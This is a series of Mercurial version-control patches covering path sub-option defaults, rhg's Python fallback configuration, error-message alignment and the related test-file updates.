b/mercurial/ui.py @@ -1031,7 +1031,7 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" try: - p = self.paths.getpath(loc) + p = self.getpath(loc) if p: return p.rawloc except error.RepoError: @@ -1039,7 +1039,7 @@ if default: try: - p = self.paths.getpath(default) + p = self.getpath(default) if p: return p.rawloc except error.RepoError: @@ -1051,6 +1051,13 @@ def 
paths(self): return paths(self) + def getpath(self, *args, **kwargs): + """see paths.getpath for details + + This method exist as `getpath` need a ui for potential warning message. + """ + return self.paths.getpath(self, *args, **kwargs) + @property def fout(self): return self._fout @@ -2190,7 +2197,7 @@ loc, sub = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub) - def getpath(self, name, default=None): + def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. ``name`` can be a named path or locations. Locations are filesystem @@ -2222,8 +2229,8 @@ except KeyError: # Try to resolve as a local path or URI. try: - # We don't pass sub-options in, so no need to pass ui instance. - return path(None, None, rawloc=name) + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615458174 -3600 # Thu Mar 11 11:22:54 2021 +0100 # Node ID e3f15c5535220d3b489aa696f63ecd6b7c618e09 # Parent 66fb045521223684373a4b47d88b9a1f6ee5b704 paths: add a `*` special path to define default sub option Differential Revision: https://phab.mercurial-scm.org/D10163 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2190,12 +2190,16 @@ def __init__(self, ui): dict.__init__(self) + _path, base_sub_options = ui.configsuboptions(b'paths', b'*') for name, loc in ui.configitems(b'paths', ignoresub=True): # No location is the same as not existing. 
if not loc: continue loc, sub = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub) + sub_opts = base_sub_options.copy() + sub_opts.update(sub) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + self._default_sub_opts = base_sub_options def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ -2230,7 +2234,9 @@ # Try to resolve as a local path or URI. try: # we pass the ui instance are warning might need to be issued - return path(ui, None, rawloc=name) + return path( + ui, None, rawloc=name, suboptions=self._default_sub_opts + ) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -146,4 +146,40 @@ ^ here) [10] +default :pushrev is taking in account + + $ echo babar > foo + $ hg ci -m 'extra commit' + $ hg up '.^' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo celeste > foo + $ hg ci -m 'extra other commit' + created new head + $ cat >> .hg/hgrc << EOF + > [paths] + > other = file://$WD/../pushurldest + > *:pushrev = . + > EOF + $ hg push other + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + $ hg push file://$WD/../pushurldest + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + no changes found + [1] + +for comparison, pushing everything would give different result + + $ hg push file://$WD/../pushurldest --rev 'all()' + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + abort: push creates new remote head 1616ce7cecc8 + (merge or see 'hg help push' for details about pushing new heads) + [20] + $ cd .. 
# HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615571132 -3600 # Fri Mar 12 18:45:32 2021 +0100 # Node ID 08a35cec14d426ceb54bd7bc45a459182d92c66a # Parent e3f15c5535220d3b489aa696f63ecd6b7c618e09 rhg: Add environment variables for fallback configuration For `run-tests.py --rhg` we want every `hg` command in tests to run `rhg` with fallback enabled, but other methods of setting configuration are limited or disruptive as discussed in the code comment. Differential Revision: https://phab.mercurial-scm.org/D10186 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -78,9 +78,27 @@ if opt_rc_path.is_none() { config.add_system_config()? } + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); config.add_for_environment_variable("VISUAL", b"ui", b"editor"); config.add_for_environment_variable("PAGER", b"pager", b"pager"); + + // These are set by `run-tests.py --rhg` to enable fallback for the + // entire test suite. Alternatives would be setting configuration + // through `$HGRCPATH` but some tests override that, or changing the + // `hg` shell alias to include `--config` but that disrupts tests that + // print command lines and check expected output. + config.add_for_environment_variable( + "RHG_ON_UNSUPPORTED", + b"rhg", + b"on-unsupported", + ); + config.add_for_environment_variable( + "RHG_FALLBACK_EXECUTABLE", + b"rhg", + b"fallback-executable", + ); + // HGRCPATH replaces user config if opt_rc_path.is_none() { config.add_user_config()?
# HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614721330 -3600 # Tue Mar 02 22:42:10 2021 +0100 # Node ID a6553ba1c59896ce5c4717e8b7b5314705690dd7 # Parent 08a35cec14d426ceb54bd7bc45a459182d92c66a tests: Enable rhg fallback to Python by default in tests The premise of `run-tests.py --rhg` is that fallback should make `rhg` behave the same as `hg`, except faster in some cases. To test this, run the whole test suite with `rhg` installed as `hg` and with fallback enabled. Differential Revision: https://phab.mercurial-scm.org/D10187 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -967,7 +967,6 @@ slowtimeout=None, usechg=False, chgdebug=False, - rhg_fallback_exe=None, useipv6=False, ): """Create a test from parameters. @@ -1025,7 +1024,6 @@ self._hgcommand = hgcommand or b'hg' self._usechg = usechg self._chgdebug = chgdebug - self._rhg_fallback_exe = rhg_fallback_exe self._useipv6 = useipv6 self._aborted = False @@ -1508,12 +1506,6 @@ hgrc.write(b'ipv6 = %r\n' % self._useipv6) hgrc.write(b'server-header = testing stub value\n') - if self._rhg_fallback_exe: - hgrc.write(b'[rhg]\n') - hgrc.write( - b'fallback-executable = %s\n' % self._rhg_fallback_exe - ) - for opt in self._extraconfigopts: section, key = _sys2bytes(opt).split(b'.', 1) assert b'=' in key, ( @@ -2999,7 +2991,6 @@ self._coveragefile = None self._createdfiles = [] self._hgcommand = None - self._rhg_fallback_exe = None self._hgpath = None self._portoffset = 0 self._ports = {} @@ -3140,10 +3131,17 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) - # set fallback executable path, then replace "hg" command by "rhg" + # configure fallback and replace "hg" command by "rhg" rhgbindir = self._bindir if self.options.rhg or self.options.with_rhg: - self._rhg_fallback_exe = os.path.join(self._bindir, self._hgcommand) + # Affects configuration.
Alternatives would be setting configuration through + # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include + # `--config` but that disrupts tests that print command lines and check expected + # output. + osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback' + osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join( + self._bindir, self._hgcommand + ) if self.options.rhg: self._hgcommand = b'rhg' elif self.options.with_rhg: @@ -3477,7 +3475,6 @@ hgcommand=self._hgcommand, usechg=bool(self.options.with_chg or self.options.chg), chgdebug=self.options.chg_debug, - rhg_fallback_exe=self._rhg_fallback_exe, useipv6=useipv6, **kwds ) diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -11,8 +11,10 @@ > fi > } + $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" + Unimplemented command - $ rhg unimplemented-command + $ $NO_FALLBACK rhg unimplemented-command unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: @@ -25,35 +27,35 @@ [252] Finding root - $ rhg root + $ $NO_FALLBACK rhg root abort: no repository found in '$TESTTMP' (.hg not found)! 
[255] $ hg init repository $ cd repository - $ rhg root + $ $NO_FALLBACK rhg root $TESTTMP/repository Reading and setting configuration $ echo "[ui]" >> $HGRCPATH $ echo "username = user1" >> $HGRCPATH - $ rhg config ui.username + $ $NO_FALLBACK rhg config ui.username user1 $ echo "[ui]" >> .hg/hgrc $ echo "username = user2" >> .hg/hgrc - $ rhg config ui.username + $ $NO_FALLBACK rhg config ui.username user2 - $ rhg --config ui.username=user3 config ui.username + $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username user3 Unwritable file descriptor - $ rhg root > /dev/full + $ $NO_FALLBACK rhg root > /dev/full abort: No space left on device (os error 28) [255] Deleted repository $ rm -rf `pwd` - $ rhg root + $ $NO_FALLBACK rhg root abort: $ENOENT$: current directory [255] @@ -68,7 +70,7 @@ > hg commit -m "commit $i" -q Listing tracked files from root - $ rhg files + $ $NO_FALLBACK rhg files file1 file2 file3 @@ -76,13 +78,13 @@ Listing tracked files from subdirectory $ mkdir -p path/to/directory $ cd path/to/directory - $ rhg files + $ $NO_FALLBACK rhg files ../../../file1 ../../../file2 ../../../file3 Listing tracked files through broken pipe - $ rhg files | head -n 1 + $ $NO_FALLBACK rhg files | head -n 1 ../../../file1 Debuging data in inline index @@ -95,20 +97,20 @@ > hg add file-$i > hg commit -m "Commit $i" -q > done - $ rhg debugdata -c 2 + $ $NO_FALLBACK rhg debugdata -c 2 8d0267cb034247ebfa5ee58ce59e22e57a492297 test 0 0 file-3 Commit 3 (no-eol) - $ rhg debugdata -m 2 + $ $NO_FALLBACK rhg debugdata -m 2 file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc) file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc) file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc) Debuging with full node id - $ rhg debugdata -c `hg log -r 0 -T '{node}'` + $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'` d1d1c679d3053e8926061b6f45ca52009f011e3f test 0 0 @@ -124,16 +126,16 @@ cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7 
91c6f6e73e39318534dc415ea4e8a09c99cd74d6 6ae9681c6d30389694d8701faf24b583cf3ccafe - $ rhg files -r cf8b83 + $ $NO_FALLBACK rhg files -r cf8b83 file-1 file-2 file-3 - $ rhg cat -r cf8b83 file-2 + $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 - $ rhg cat -r c file-2 + $ $NO_FALLBACK rhg cat -r c file-2 abort: ambiguous revision identifier c [255] - $ rhg cat -r d file-2 + $ $NO_FALLBACK rhg cat -r d file-2 2 Cat files @@ -144,37 +146,36 @@ $ echo "original content" > original $ hg add original $ hg commit -m "add original" original - $ rhg cat -r 0 original + $ $NO_FALLBACK rhg cat -r 0 original original content Cat copied file should not display copy metadata $ hg copy original copy_of_original $ hg commit -m "add copy of original" - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original original content Fallback to Python - $ rhg cat original + $ $NO_FALLBACK rhg cat original unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ FALLBACK="--config rhg.on-unsupported=fallback" - $ rhg cat original $FALLBACK + $ rhg cat original original content - $ rhg cat original $FALLBACK --config rhg.fallback-executable=false + $ rhg cat original --config rhg.fallback-executable=false [1] - $ rhg cat original $FALLBACK --config rhg.fallback-executable=hg-non-existent + $ rhg cat original --config rhg.fallback-executable=hg-non-existent tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ rhg cat original $FALLBACK --config rhg.fallback-executable="$RHG" + $ rhg cat original --config rhg.fallback-executable="$RHG" Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. 
(glob) unsupported feature: `rhg cat` without `--rev` / `-r` [252] Requirements - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements dotencode fncache generaldelta @@ -183,20 +184,20 @@ store $ echo indoor-pool >> .hg/requires - $ rhg files + $ $NO_FALLBACK rhg files unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ echo -e '\xFF' >> .hg/requires - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements abort: corrupted repository: parse error in 'requires' file [255] @@ -205,7 +206,7 @@ $ rm -rf repository $ hg init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -213,14 +214,14 @@ $ ls .hg/store/00changelog* .hg/store/00changelog.d .hg/store/00changelog.i - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of $ cd $TESTTMP $ rm -rf repository $ hg --config format.use-persistent-nodemap=True init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap persistent-nodemap $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -232,9 +233,9 @@ .hg/store/00changelog.n Specifying revisions by changeset ID - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of - $ rhg cat -r c3ae8dec9fad of + $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of r5000 Crate a shared repository @@ -254,9 +255,9 @@ And check that basic rhg commands work with sharing - $ 
rhg files -R repo2 + $ $NO_FALLBACK rhg files -R repo2 repo2/a - $ rhg -R repo2 cat -r 0 repo2/a + $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a a Same with relative sharing @@ -265,9 +266,9 @@ updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ rhg files -R repo3 + $ $NO_FALLBACK rhg files -R repo3 repo3/a - $ rhg -R repo3 cat -r 0 repo3/a + $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a a Same with share-safe @@ -290,9 +291,9 @@ And check that basic rhg commands work with sharing $ cd repo5 - $ rhg files + $ $NO_FALLBACK rhg files a - $ rhg cat -r 0 a + $ $NO_FALLBACK rhg cat -r 0 a a The blackbox extension is supported @@ -301,7 +302,7 @@ $ echo "blackbox =" >> $HGRCPATH $ echo "[blackbox]" >> $HGRCPATH $ echo "maxsize = 1" >> $HGRCPATH - $ rhg files > /dev/null + $ $NO_FALLBACK rhg files > /dev/null $ cat .hg/blackbox.log ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) $ cat .hg/blackbox.log.1 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614790854 -3600 # Wed Mar 03 18:00:54 2021 +0100 # Node ID 78e6700ab009172adc3f92285ec019a41a230514 # Parent a6553ba1c59896ce5c4717e8b7b5314705690dd7 tests: Add `rhg` and `no-rhg` for #require and #if in .t files With this we can allow some small differences in expected output between Rust-based and Python-based code paths. 
Differential Revision: https://phab.mercurial-scm.org/D10096 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -188,6 +188,11 @@ return 'CHGHG' in os.environ +@check("rhg", "running with rhg as 'hg'") +def has_rhg(): + return 'RHG_INSTALLED_AS_HG' in os.environ + + @check("cvs", "cvs client/server") def has_cvs(): re = br'Concurrent Versions System.*?server' diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -3134,6 +3134,8 @@ # configure fallback and replace "hg" command by "rhg" rhgbindir = self._bindir if self.options.rhg or self.options.with_rhg: + # Affects hghave.py + osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1' # Affects configuration. Alternatives would be setting configuration through # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include # `--config` but that disrupts tests that print command lines and check expected diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,15 +1,4 @@ -#require rust - -Define an rhg function that will only run if rhg exists - $ RHG="$RUNTESTDIR/../rust/target/release/rhg" - $ rhg() { - > if [ -f "$RHG" ]; then - > "$RHG" "$@" - > else - > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." - > exit 80 - > fi - > } +#require rhg $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" @@ -169,8 +158,8 @@ unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ rhg cat original --config rhg.fallback-executable="$RHG" - Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. (glob) + $ rhg cat original --config rhg.fallback-executable=rhg + Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself. 
unsupported feature: `rhg cat` without `--rev` / `-r` [252] # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614723503 -3600 # Tue Mar 02 23:18:23 2021 +0100 # Node ID df247f58ecee02205bd0b3e5b8d3c31cdb83df03 # Parent 78e6700ab009172adc3f92285ec019a41a230514 rhg: Fall back to Python for unsupported revset syntax rhg only supports a small subset of the syntax. On parse error, this gives Python a chance instead of aborting immediately. Differential Revision: https://phab.mercurial-scm.org/D10097 diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs --- a/rust/hg-core/src/revset.rs +++ b/rust/hg-core/src/revset.rs @@ -2,6 +2,7 @@ //! //! <https://www.mercurial-scm.org/repo/hg/help/revsets> +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::revlog::{Revlog, RevlogError}; @@ -28,7 +29,10 @@ // TODO: support for the rest of the language here. - Err(RevlogError::InvalidRevision) + Err( + HgError::unsupported(format!("cannot parse revset '{}'", input)) + .into(), + ) } /// Resolve the small subset of the language suitable for revlogs other than # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793102 -3600 # Wed Mar 03 18:38:22 2021 +0100 # Node ID 92e3cfd63096be23bdf4da0682b70de501a54789 # Parent df247f58ecee02205bd0b3e5b8d3c31cdb83df03 rhg: Fall back to Python on unsupported `rhg config <section>` Printing an entire section (as opposed to a single value with `rhg config foo.bar`) is not supported yet in Rust only. 
Differential Revision: https://phab.mercurial-scm.org/D10098 diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -27,7 +27,7 @@ .expect("missing required CLI argument") .as_bytes() .split_2(b'.') - .ok_or_else(|| HgError::abort(""))?; + .ok_or_else(|| HgError::unsupported("hg config <section>"))?; let value = invocation.config.get(section, name).unwrap_or(b""); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793217 -3600 # Wed Mar 03 18:40:17 2021 +0100 # Node ID 28a54c128e82b576f187d3b3f88a2cf2284777e2 # Parent 92e3cfd63096be23bdf4da0682b70de501a54789 rhg: Align "malformed --config" error message with Python Differences in error message formatting can cause tests to fail. Differential Revision: https://phab.mercurial-scm.org/D10099 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -74,7 +74,7 @@ layer.add(section, item, value, None); } else { Err(HgError::abort(format!( - "malformed --config option: \"{}\" \ + "malformed --config option: '{}' \ (use --config section.name=value)", String::from_utf8_lossy(arg), )))? # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793385 -3600 # Wed Mar 03 18:43:05 2021 +0100 # Node ID 562a676e255a5db7e246daea47bc7d7f3cc8746b # Parent 28a54c128e82b576f187d3b3f88a2cf2284777e2 rhg: Print non-absolutized path in "repository {} not found" errors … like Python does. Differences in output can cause tests to fail.
Differential Revision: https://phab.mercurial-scm.org/D10100 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -58,9 +58,9 @@ if let Some(root) = explicit_path { // Having an absolute path isn’t necessary here but can help code // elsewhere - let root = current_dir()?.join(root); - if root.join(".hg").is_dir() { - Self::new_at_path(root, config) + let absolute_root = current_dir()?.join(root); + if absolute_root.join(".hg").is_dir() { + Self::new_at_path(absolute_root, config) } else { Err(RepoError::NotFound { at: root.to_owned(), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614794526 -3600 # Wed Mar 03 19:02:06 2021 +0100 # Node ID 6cd9f53aaed8ad1a982185a8c299c45374c3bb58 # Parent 562a676e255a5db7e246daea47bc7d7f3cc8746b rhg: Fall back to Python on --repository with an URL A low-hanging fruit to improve on this would be to properly parse and handle `file:` URLs. But other Python-based hg supports some other URL schemes for features that rhg does not support yet. Differential Revision: https://phab.mercurial-scm.org/D10101 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -826,8 +826,10 @@ "env_logger", "format-bytes", "hg-core", + "lazy_static", "log", "micro-timer", + "regex", "users", ] diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -12,8 +12,10 @@ chrono = "0.4.19" clap = "2.33.1" derive_more = "0.99" +lazy_static = "1.4.0" log = "0.4.11" micro-timer = "0.3.1" +regex = "1.3.9" env_logger = "0.7.1" format-bytes = "0.2.0" users = "0.11.0" diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -95,6 +95,25 @@ exit(&ui, on_unsupported, Err(error.into())) }); + if let Some(repo_path_bytes) = &early_args.repo { + lazy_static::lazy_static! 
{ + static ref SCHEME_RE: regex::bytes::Regex = + // Same as `_matchscheme` in `mercurial/util.py` + regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap(); + } + if SCHEME_RE.is_match(&repo_path_bytes) { + exit( + &ui, + OnUnsupported::from_config(&non_repo_config), + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"URL-like --repository {}", + repo_path_bytes + ), + }), + ) + } + } let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); let repo_result = match Repo::find(&non_repo_config, repo_path) { Ok(repo) => Ok(repo), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614794907 -3600 # Wed Mar 03 19:08:27 2021 +0100 # Node ID dfd35823635b494d1c7e40d13a2a4b736e31a159 # Parent 6cd9f53aaed8ad1a982185a8c299c45374c3bb58 rhg: Fall back to Python for bundle repositories rhg does not support bundles at all, yet. Differential Revision: https://phab.mercurial-scm.org/D10102 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -61,6 +61,8 @@ let absolute_root = current_dir()?.join(root); if absolute_root.join(".hg").is_dir() { Self::new_at_path(absolute_root, config) + } else if absolute_root.is_file() { + Err(HgError::unsupported("bundle repository").into()) } else { Err(RepoError::NotFound { at: root.to_owned(), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614797268 -3600 # Wed Mar 03 19:47:48 2021 +0100 # Node ID 3d692e724d068013d0aaf1c0d290c89f2020a409 # Parent dfd35823635b494d1c7e40d13a2a4b736e31a159 rhg: Align config file parse error formatting with Python Differences can cause tests to fail Differential Revision: https://phab.mercurial-scm.org/D10110 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -9,7 +9,7 @@ use crate::errors::{HgError, IoResultExt}; use 
crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; -use format_bytes::{write_bytes, DisplayBytes}; +use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; @@ -187,10 +187,15 @@ map.remove(&m[1]); } } else { + let message = if bytes.starts_with(b" ") { + format_bytes!(b"unexpected leading whitespace: {}", bytes) + } else { + bytes.to_owned() + }; return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), line: Some(index + 1), - bytes: bytes.to_owned(), + message, } .into()); } @@ -278,7 +283,7 @@ pub struct ConfigParseError { pub origin: ConfigOrigin, pub line: Option<usize>, - pub bytes: Vec<u8>, + pub message: Vec<u8>, } #[derive(Debug, derive_more::From)] diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -78,10 +78,10 @@ match self { HgError::Abort(explanation) => write!(f, "{}", explanation), HgError::IoError { error, context } => { - write!(f, "{}: {}", error, context) + write!(f, "abort: {}: {}", context, error) } HgError::CorruptedRepository(explanation) => { - write!(f, "corrupted repository: {}", explanation) + write!(f, "abort: corrupted repository: {}", explanation) } HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) @@ -128,8 +128,12 @@ from.display(), to.display() ), - IoErrorContext::CurrentDir => write!(f, "current directory"), - IoErrorContext::CurrentExe => write!(f, "current executable"), + IoErrorContext::CurrentDir => { + write!(f, "error getting current working directory") + } + IoErrorContext::CurrentExe => { + write!(f, "error getting current executable") + } } } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -87,7 +87,7 @@ let NoRepoInCwdError { cwd } = error; CommandError::Abort { message: format_bytes!( - b"no 
repository found in '{}' (.hg not found)!", + b"abort: no repository found in '{}' (.hg not found)!", get_bytes_from_path(cwd) ), } @@ -108,19 +108,19 @@ let ConfigParseError { origin, line, - bytes, + message, } = error; let line_message = if let Some(line_number) = line { - format_bytes!(b" at line {}", line_number.to_string().into_bytes()) + format_bytes!(b":{}", line_number.to_string().into_bytes()) } else { Vec::new() }; CommandError::Abort { message: format_bytes!( - b"config parse error in {}{}: '{}'", + b"config error at {}{}: {}", origin, line_message, - bytes + message ), } } @@ -130,11 +130,11 @@ fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { RevlogError::InvalidRevision => CommandError::abort(format!( - "invalid revision identifier {}", + "abort: invalid revision identifier: {}", rev )), RevlogError::AmbiguousPrefix => CommandError::abort(format!( - "ambiguous revision identifier {}", + "abort: ambiguous revision identifier: {}", rev )), RevlogError::Other(error) => error.into(), diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -201,8 +201,7 @@ if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting // with failure code so there’s not much more we can do. 
- let _ =
- ui.write_stderr(&format_bytes!(b"abort: {}\n", message));
+ let _ = ui.write_stderr(&format_bytes!(b"{}\n", message)); } } Err(CommandError::UnsupportedFeature { message }) => { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -45,7 +45,7 @@ Deleted repository $ rm -rf `pwd` $ $NO_FALLBACK rhg root - abort: $ENOENT$: current directory + abort: error getting current working directory: $ENOENT$ [255] Listing tracked files @@ -122,7 +122,7 @@ $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 $ $NO_FALLBACK rhg cat -r c file-2 - abort: ambiguous revision identifier c + abort: ambiguous revision identifier: c [255] $ $NO_FALLBACK rhg cat -r d file-2 2 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614798127 -3600 # Wed Mar 03 20:02:07 2021 +0100 # Node ID 60fe9ebae29bc89646a50d7ef458fbe04f93e161 # Parent 3d692e724d068013d0aaf1c0d290c89f2020a409 rhg: Sort config files when adding a directory For example in `/etc/mercurial/hgrc.d/` or with `HGRCPATH=some-directory`. Previously files were parsed in the order returned by the filesystem, which is undefined. But order is significant when multiple files define the same configuration key: the "last" one wins. Differential Revision: https://phab.mercurial-scm.org/D10111 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -125,8 +125,13 @@ .when_reading_file(path) .io_not_found_as_none()? { - for entry in entries { - let file_path = entry.when_reading_file(path)?.path(); + let mut file_paths = entries + .map(|result| { + result.when_reading_file(path).map(|entry| entry.path()) + }) + .collect::<Result<Vec<_>, _>>()?; + file_paths.sort(); + for file_path in &file_paths { if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { self.add_trusted_file(&file_path)?
